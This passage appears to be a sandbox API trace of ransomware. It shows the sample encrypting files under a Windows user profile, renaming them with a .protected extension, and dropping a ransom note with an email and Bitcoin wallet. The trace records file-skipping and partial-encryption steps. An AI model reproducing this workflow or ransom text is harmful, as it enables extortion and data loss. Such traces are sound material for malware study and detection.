(lpString1="..", lpString2=".") returned 1 [0085.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.251] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.251] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.251] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\RESTORE_FILES.txt") returned 95 [0085.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\taskschedulerconfig\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.252] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.252] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.252] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.253] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.253] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.253] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.253] CloseHandle (hObject=0xd8) returned 1 [0085.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Windows") returned -1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Program Files") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Program Files (x86)") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="$Recycle.bin") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="System Volume Information") returned 1 [0085.253] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio") returned 63 [0085.253] lstrcmpW (lpString1="Visio", lpString2=".") returned 1 [0085.253] lstrcmpW (lpString1="Visio", lpString2="..") returned 1 [0085.253] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*") returned 65 [0085.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.254] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\.") returned 65 [0085.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.254] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\..") returned 66 [0085.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.254] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.254] StrStrIW (lpFirst="content14.dat", lpSrch=".protected") returned 0x0 [0085.254] lstrcmpW (lpString1="content14.dat", lpString2="RESTORE_FILES.txt") returned -1 [0085.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".txt") returned 0x0 [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".rar") returned 0x0 [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".zip") returned 0x0 [0085.255] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.257] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.257] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.257] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.257] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.263] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.263] CloseHandle (hObject=0x14c) returned 1 [0085.263] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.protected") returned 87 [0085.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat.protected")) returned 1 [0085.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Windows") returned -1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Program Files") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Program Files (x86)") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="$Recycle.bin") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="System Volume Information") returned 1 [0085.265] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrIW (lpFirst="thumbs.dat", lpSrch=".protected") returned 0x0 [0085.265] lstrcmpW (lpString1="thumbs.dat", lpString2="RESTORE_FILES.txt") returned 1 [0085.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrW (lpFirst="thumbs.dat", lpSrch=".txt") returned 0x0 [0085.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrW (lpFirst="thumbs.dat", lpSrch=".rar") returned 0x0 [0085.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.266] StrStrW (lpFirst="thumbs.dat", lpSrch=".zip") returned 0x0 [0085.266] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.271] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.272] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.272] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.272] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.273] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.273] CloseHandle (hObject=0x14c) returned 1 [0085.273] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.protected") returned 84 [0085.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat.protected")) returned 1 [0085.274] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.274] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.274] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\RESTORE_FILES.txt") returned 81 [0085.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.290] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.290] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.291] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.291] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.291] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.291] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.291] CloseHandle (hObject=0xd8) returned 1 [0085.292] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.292] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0085.292] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Windows") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files (x86)") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="$Recycle.bin") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="System Volume Information") returned 1 [0085.292] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail") returned 70 [0085.292] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0085.292] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0085.292] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned 72 [0085.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.294] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\.") returned 72 [0085.294] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.294] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.295] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\..") returned 73 [0085.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Windows") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files (x86)") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="System Volume Information") returned -1 [0085.295] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.295] StrStrIW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".protected") returned 0x0 [0085.295] lstrcmpW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".rar") returned 0x0 [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".zip") returned 0x0 [0085.296] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 